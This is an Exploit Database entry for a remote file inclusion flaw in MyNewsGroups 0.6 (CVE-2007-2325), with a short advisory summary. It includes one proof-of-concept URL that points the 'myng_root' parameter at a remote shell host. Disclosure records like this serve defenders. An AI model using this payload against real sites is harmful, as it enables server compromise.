Exploit Database - Logo

MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion

EDB-ID: 29899 Author: Ali & Saeid Published: 2007-04-25
CVE: CVE-2007-2325 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/23646/info

MyNewsGroups is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects MyNewsGroups 0.6; other versions may also be vulnerable. 

http://www.example.com/include.php?myng_root=http://shell
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2007-2325
Trying to match OSVDBs (1): 34157
Other Possible E-DB Search Terms: MyNewsGroups 0.6,  MyNewsGroups
Date D V Title Author
2006-07-31 Verified MyNewsGroups 0.6b - 'myng_root' Remote InclusionPhilipp Nie...
Menu